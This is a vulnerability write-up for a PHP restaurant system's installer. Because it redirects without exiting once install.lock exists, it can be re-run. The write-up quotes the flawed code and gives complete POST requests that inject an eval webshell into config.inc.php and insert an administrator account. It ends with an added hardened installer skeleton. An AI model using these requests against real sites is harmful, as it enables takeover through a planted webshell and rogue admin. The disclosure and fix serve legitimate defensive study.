The problem lies in /install/index.php. Once the program has been installed, an install.lock file is created in the program's root directory, but the check in /install/index.php for install.lock is wrong.
<?php
if(file_exists("../install.lock"))
{
    header("Location: ../"); // sends the redirect but never exits
}

//echo 'tst';exit;
require_once("init.php");
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
{
So when install.lock exists, header() only queues a 302 redirect and never exits, which means the logic that follows still executes. At least two vulnerabilities arise from this.

1. getshell (very dangerous)
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
{
    $smarty->assign("step",1);
    $smarty->display("index.html");
}elseif($_REQUEST['step']==2)
{
    $mysql_host=trim($_POST['mysql_host']);
    $mysql_user=trim($_POST['mysql_user']);
    $mysql_pwd=trim($_POST['mysql_pwd']);
    $mysql_db=trim($_POST['mysql_db']);
    $tblpre=trim($_POST['tblpre']);
    $domain==trim($_POST['domain']); // comparison rather than assignment in the original source
    $str="<?php \r\n";
    $str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";
    $str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";
    $str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";
    $str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";
    $str.='define("MYSQL_CHARSET","GBK");'."\r\n";
    $str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";
    $str.='define("DOMAIN","'.$domain.'");'."\r\n";
    $str.='define("SKINS","default");'."\r\n";
    $str.='?>';
    file_put_contents("../config/config.inc.php",$str); // writes the submitted values into a PHP file
The code above writes the POSTed data straight into ../config/config.inc.php, so submitting the following POST request yields a one-line webshell:
POST /canting/install/index.php?m=index&step=2 HTTP/1.1
Host: 192.168.80.129
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.80.129/canting/install/index.php?step=1
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
Content-Type: application/x-www-form-urlencoded
Content-Length: 126

mysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD
But this method is very dangerous: it will leave the site unable to run.

2. Adding an administrator directly
elseif($_REQUEST['step']==5)
{
    if($_POST)
    {
        require_once("../config/config.inc.php");
        $link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);
        mysql_select_db(MYSQL_DB,$link);
        mysql_query("SET NAMES ".MYSQL_CHARSET );
        mysql_query("SET sql_mode=''");

        $adminname=trim($_POST['adminname']);
        $pwd1=trim($_POST['pwd1']);
        $pwd2=trim($_POST['pwd2']);
        if(empty($adminname))
        {
            echo "<script>alert('管理员不能为空');history.go(-1);</script>";
            exit();
        }
        if(($pwd1!=$pwd2) or empty($pwd1))
        {
            echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>"; // no exit here either
        }
        mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)"); // inserts an administrator directly
    }
So we can insert an administrator account qingshen/qingshen directly; the request is as follows:
POST /canting/install/index.php?m=index&step=5 HTTP/1.1
Host: 192.168.80.129
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.2cto.com /canting/install/index.php?step=1
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
Content-Type: application/x-www-form-urlencoded
Content-Length: 46

adminname=qingshen&pwd1=qingshen&pwd2=qingshen
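As an added example that is not part of the original write-up and not the project's own code, the following PHP skeleton shows how the three defects discussed above (the redirect without exit, the config file assembled from raw input, and the password check that falls through to the INSERT) are closed. It calls exit immediately after the redirect so nothing runs on a locked install, builds the config file with var_export() so submitted values are stored as inert string literals rather than spliced into PHP source, and terminates the request on every failed check before the INSERT, which uses a prepared statement and password_hash() in place of the project's umd5() helper. The constant names, file paths and helper functions (buildConfig, validateInstallInput) are assumptions; the admin table columns follow the original query.

```php
<?php
// Added example (not the project's code): hardened installer skeleton.
// Paths, constant names and helper names below are assumptions.
declare(strict_types=1);

define('LOCK_FILE', __DIR__ . '/../install.lock');
define('CONFIG_FILE', __DIR__ . '/../config/config.inc.php');

// 1. Refuse to run at all once installation has completed. The original only
//    queued the Location header; without exit, PHP keeps executing the script.
if (file_exists(LOCK_FILE)) {
    header('Location: ../', true, 302);
    exit; // nothing below this line runs for a locked install
}

// 2. Emit the config file from values, never by concatenating raw input into
//    PHP source. var_export() produces a correctly quoted PHP literal, so a
//    value containing  ");  or  ?>  stays an ordinary string constant.
function buildConfig(array $values): string
{
    $out = "<?php\n";
    foreach ($values as $name => $value) {
        if (!preg_match('/^[A-Z_]+$/', $name)) {
            throw new InvalidArgumentException("bad constant name: $name");
        }
        $out .= 'define(' . var_export($name, true) . ', '
              . var_export((string) $value, true) . ");\n";
    }
    return $out;
}

// 3. Validate the fields that later land in SQL identifiers or the config file.
function validateInstallInput(array $post): array
{
    $host = trim($post['mysql_host'] ?? '');
    $db   = trim($post['mysql_db'] ?? '');
    $pre  = trim($post['tblpre'] ?? '');
    if ($host === '' || $db === '') {
        throw new InvalidArgumentException('mysql_host and mysql_db are required');
    }
    // The prefix is interpolated into table names, so restrict its alphabet.
    if (!preg_match('/^[A-Za-z0-9_]{0,16}$/', $pre)) {
        throw new InvalidArgumentException('table prefix may only contain [A-Za-z0-9_]');
    }
    return [
        'MYSQL_HOST'    => $host,
        'MYSQL_USER'    => trim($post['mysql_user'] ?? ''),
        'MYSQL_PWD'     => trim($post['mysql_pwd'] ?? ''),
        'MYSQL_DB'      => $db,
        'MYSQL_CHARSET' => 'GBK',
        'TABLE_PRE'     => $pre,
        'DOMAIN'        => trim($post['domain'] ?? ''),
        'SKINS'         => 'default',
    ];
}

$step = (int) ($_REQUEST['step'] ?? 1);

if ($step === 2 && $_SERVER['REQUEST_METHOD'] === 'POST') {
    try {
        $config = buildConfig(validateInstallInput($_POST));
    } catch (InvalidArgumentException $e) {
        http_response_code(400);
        echo htmlspecialchars($e->getMessage(), ENT_QUOTES, 'UTF-8');
        exit;
    }
    file_put_contents(CONFIG_FILE, $config, LOCK_EX);
}

if ($step === 5 && $_SERVER['REQUEST_METHOD'] === 'POST') {
    require_once CONFIG_FILE;
    $adminname = trim($_POST['adminname'] ?? '');
    $pwd1 = $_POST['pwd1'] ?? '';
    $pwd2 = $_POST['pwd2'] ?? '';
    // 4. Every failed check terminates the request; the original fell
    //    through to the INSERT when the two passwords did not match.
    if ($adminname === '' || $pwd1 === '' || $pwd1 !== $pwd2) {
        http_response_code(400);
        echo 'administrator name and two matching passwords are required';
        exit;
    }
    $dsn = 'mysql:host=' . MYSQL_HOST . ';dbname=' . MYSQL_DB
         . ';charset=' . strtolower(MYSQL_CHARSET);
    $pdo = new PDO($dsn, MYSQL_USER, MYSQL_PWD);
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    // Prepared statement instead of string interpolation into the INSERT.
    $stmt = $pdo->prepare('INSERT INTO ' . TABLE_PRE
          . 'admin (adminname, password, isfounder) VALUES (?, ?, 1)');
    $stmt->execute([$adminname, password_hash($pwd1, PASSWORD_DEFAULT)]);
    // 5. Write the lock last, so a half-finished install is not mistaken for
    //    a completed one and any later request is stopped by the check at the top.
    file_put_contents(LOCK_FILE, date('c'), LOCK_EX);
}
```

The order matters: the lock check and its exit sit before any require or request handling, the config writer never sees a raw string, and each validation branch ends the request rather than merely printing a message. With those three changes in place, both POST requests shown above are answered with a redirect or a 400 and write nothing.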